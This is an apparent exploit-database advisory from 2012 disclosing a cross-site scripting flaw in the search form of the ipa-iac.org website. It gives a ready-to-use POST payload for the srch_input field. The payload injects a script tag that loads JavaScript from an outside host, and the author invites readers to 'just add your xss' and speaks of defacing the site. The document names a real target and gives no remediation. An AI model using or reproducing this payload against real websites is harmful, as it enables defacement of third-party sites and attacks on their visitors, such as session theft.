IPA-IAC.org suffers from a cross site scripting vulnerability.
77a9e2f310258d1940bc0fe562fc77d876b8fef7e84ca4cef9c39a6d6b387064
+-------------------------------------------------------------------------+
# Exploit Title : ipa-iac.org - website XSS (Cross Site Scripting) and
deface passive
# Author : Atmon3r
# Date : 26/04/2012
# Xss type : $_POST
+-------------------------------------------------------------------------+
[+] POC:
POST /searchResult.php
srch_input=%2F%22%3E%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2Fyourjavascript.com%2F27544112151%2Fxss.atmon3r.js%22%3E%3C%2Fscript%3E
[+] DEMO:
Just add your xss in input search :D
--
Website: http://atmoner.com